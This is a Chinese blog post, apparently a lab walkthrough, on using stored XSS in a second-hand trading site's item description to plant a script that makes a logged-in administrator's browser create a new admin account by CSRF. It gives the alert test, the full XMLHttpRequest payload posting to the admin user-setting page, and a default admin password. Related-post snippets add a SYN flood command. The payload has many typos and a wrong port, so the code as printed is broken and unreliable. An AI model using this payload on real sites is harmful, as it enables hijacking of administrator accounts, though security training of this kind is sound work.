Csrf利用管理员权限创建后台管理账户

最新推荐文章于 2022-03-17 00:21:50 发布
最新推荐文章于 2022-03-17 00:21:50 发布
阅读量2.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36791000/article/details/56004392
版权

[实验原理]

通过普通用户的储存型XSS实现创建管理员账户的CSRF利用

一、测试漏洞

打开网站:http://192.168.1.3:8007(安徽二手网)

注册一个用户并登录

添加二手信息

在物品简介处填写:<script>alert(123)</script>

点击打开首页,点击刚刚发布的信息,弹出信息,说明漏洞存在

二、利用漏洞

在首页继续添加二手信息,再次编辑,在物品简介处填写内容:

<script type="text/javascript">

function loadXMLDoc()

{

var xmlhttp;

if(window.XMLHttpRequest)

{//code for IE7+,Firefox,Chrome,Opear,Safari

xmlhttp=new XMLHttpRequest();

}

else

{//code for IE6,IE5

xmlhttp=new AceiveXOject("Microsoft.XMLHTTP");

}

xmlhttp.onriadystatechange=function()

{if(xmlhttp.readyState==4&&xmlhttp.staus==200)

{

document.getElementByld("myDiv").innerHTML=xmlhttp.responseText;

}

}

xmlhttp.open("POST","http://192.168.1.3:80007/admin/admin_usersetting.asp",true);

xmlgttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

xmlhttp.send("action=add&UserName=zhangsan&PassWord=123456~密码?~&isActive=1&isAdmin=1&pubSubCateID=91&Submit=+%C8%B7+%B6%A8+");

}

loadXMLDoc()

</script>

回到首页,推出zhangsan用户

输入后台路径:http://192.168.1.3:8007/admin/user.asp

使用admin/admin888~使用管理员用户密码登录~登录

回到首页,浏览器输入:http://192.168.1.3:8007,查看帖子(修改后的)点击此条物品消息,没有什么异常现象。

此时管理员再次进入自己的后台:http://192.168.1.3:8007/admin/user.asp在“系统用户管理”中,发现多了一个账户zhangsan。

退出admin用户。此时用zhangsan/123456登录后台

登录成功。

苍白的小包叽
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
网络管理mysql实验总结_网络安全实验报告 第二章
weixin_28884205的博客
02-05 411
利用TCP协议实现synflood攻击运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态。利用xdos工具进行攻击首先在192.168.1.3的目标机器上打开wireshark,过滤出ip.dst=192.168.1.3的IP包。再在192.168.1.2的发动攻击的主机上输入命令:192.168.1.3 135 -t 3 -s 55.55.55.55。利用wireshar...
Web安全 CSRF漏洞的 测试和利用.(修改 管理员账号密码.)
网络安全领域___专研者.
02-18 4347
CSRF漏洞的 概括: CSRF(跨站请求伪造)漏洞的原理:攻击者是通过用户浏览了攻击者构造的链接,从而达成一个攻击的目的。主要的作用是:浏览器的安全策略是允许页面发送到任何地址的请求,攻击者可以控制页面的内容来控制浏览器 发送攻击者精心构造的请求.
WEB安全的学习总结与心得(七)——CSRF漏洞
weixin_44681434的博客
05-10 494
WEB安全的学习总结与心得(七) 01 CSRF漏洞之简介 属性 属性 介绍 英文全称 Cross-site request forgery 中文全称 跨站请求伪造 危害 执行恶意操作(如被转账);制造蠕虫等 漏洞类型 客户端漏洞 定义 利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 CSRF漏洞触发机制 ...
CSRF总结(一)
qq_43511094的博客
03-17 5046
文件包含漏洞相关知识总结 文件包含漏洞概念 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入 2. 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 常见文件包含函数 include() require() include_once
74cms CSRF漏洞可以诱骗添加管理员
lfzhumengzhe的博客
03-17 2352
74cms CSRF漏洞可以诱骗添加管理员
ASP网站后台管理系统
08-24
3. 权限控制:通过角色分配,管理员可以设置不同级别的访问权限,如超级管理员、编辑员、普通用户等,以确保数据的安全性和完整性。 4. 内容管理:对于网站内容的更新和管理是后台系统的核心功能之一,可能包括新闻...
PHP云人才系统(phpyun) v3.1 build140730
04-03
(28)、新增后台管理员上次登录时间 (29)、个人会员中心,企业会员中心全面改版 (30)、优化后台生成效率 (31)、优化企业环境批量上传 (32)、优化创建简历模式及界面 (33)、优化SEO设置 (34)、优化用户、企业、猎头...
Shopnc b2b2c 好商城V5 33hao-V5完整源码.zip
01-13
新增店铺设置管理权限功能 √ 平台管理员可设置店铺相关权限 商家操作日志功能 √ 商家可查看子管理员等操作日志 商家等级功能 √ 可根据不同服务标准设置不同的商家等级 商家店铺分类功能 √ 可根据商家服务不同...
新闻发布系统
12-09
新闻表用于存储新闻的详细信息,用户表存储普通用户的登录信息,而管理员表则用于管理具有高级权限的账户,比如发布和编辑新闻的权限。 在系统操作中,连接数据库是关键步骤。通过PHP的MySQL函数,我们可以建立与...
PHP云人才系统 人才网站源码
06-05
(28)、新增后台管理员上次登录时间 (29)、个人会员中心,企业会员中心全面改版 (30)、优化后台生成效率 (31)、优化企业环境批量上传 (32)、优化创建简历模式及界面 (33)、优化SEO设置 (34)、优化用户、企业、猎头...
springboot+spring security +csrf 的拥有后台管理功能的厨具批发商城网站
04-25
文件解压后直接在根目录上找shopping.sql文件导入mysql数据库,创建数据库名为shopping,在此数据库默认导入即可(utf-8),使用idea直接打开项目等待maven导入jar 包即可
[转]信息安全相关理论题(二)
热门推荐
Herry_Lee的专栏
02-18 18万+
27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸 A、 对 B、 错 您的答案: 标准答案: B 28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是 A、 传输层 B、 表示层 C、 会话层 D、 应用层 您的答案: 标准答案: C 29、网络中端口与端口之间连接所用的层是 A、 网络层 B、 表示层 ...
CSRF跨站请求伪造漏洞原理及代码审计
11-05
课程声明:该课程是教学使用,视频内涉及漏洞利用方法,请勿在互联网环境中使用;维护互联网网络安全,人人有责。课程说明:课程为CISP-PTE子课程。实验所需环境:vmware;windows server一台;环境下载地址:实验环境下载地址在购买后单独发送课程主要解决问题:1、搞明白什么是,CSRFSRF能做什么事情?2、CSRF和XSS有什么区别?3、搞明白CSRF的漏洞代码到底是什么样?逐行读代码让你看透CSRF。4、搞懂CSRF的防御方法。 如果有以上困惑赶紧学习吧,Margin老师工作日一般都是30分钟就能为你解答疑惑,沟通无延时、无障碍。
iGamingCMS CSRF漏洞伪造POST添加管理员
jpygx123的博客
10-11 1282
正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user 这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。 可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.p...
CSRF跨站点伪造请求攻击——脱库及密码修改
温柔小薛的博客
04-11 1023
脱库及密码修改 CSRF 快速拖库案例 拖库’本来是数据库领域的术语,指从数据库中导出数据。到了黑客攻击泛滥的今天,它被用来指网站遭到入侵后,黑客窃取其数据库。 网站数据库被拖,直接导致用户信息泄露,造成的危害很大,比如:CSDN 明文密码泄露事件、小米 800W 用户信息泄露事件等等 首先,我们先登录一下 discuz 的后台,模拟管理员进行周期性的数据库备份。(admin) Uce...
Web攻击手段之XSS攻击,CRSF, SQL注入攻击
chenglinhust的专栏
06-05 2862
Web攻击手段之XSS攻击,CRSF, SQL注入攻击       1.  XSS攻击        XSS攻击的全称是跨站脚本攻击,指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时,脚本程序便开始在客户端的浏览器上执行,以盗取客户端cookie,用户名密码,下载执行病毒密码程序,甚至是获取客户端admin权限等。              2.  CRSF攻击    
后台管理系统CSRF浏览器测试方法
最新发布
05-19
CSRF(跨站请求伪造)是一种常见的网络攻击方式,攻击者利用用户在已登录的情况下发起的请求,来执行恶意操作。为了防止这种攻击,后台管理系统通常会采用CSRF防护措施。 要测试后台管理系统中是否存在CSRF漏洞,可以使用以下方法: 1. 打开浏览器的开发者工具(F12),进入Network(网络)选项卡。 2. 登录后台管理系统,并在浏览器中保持登录状态。 3. 手动构造一个POST请求,其中包含攻击者想要执行的恶意操作。可以使用Postman等工具来构造请求,也可以手动编写HTML页面来发起请求。 4. 在请求中添加一个伪造的CSRF令牌,可以在前端代码或后端代码中查找该令牌。 5. 发送请求并观察响应。如果请求成功执行了恶意操作,说明后台管理系统存在CSRF漏洞。 需要注意的是,CSRF漏洞的修复方法通常是在后端代码中添加CSRF防护措施,例如使用Token验证、Referer检查等方法来验证请求的来源,防止恶意请求的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值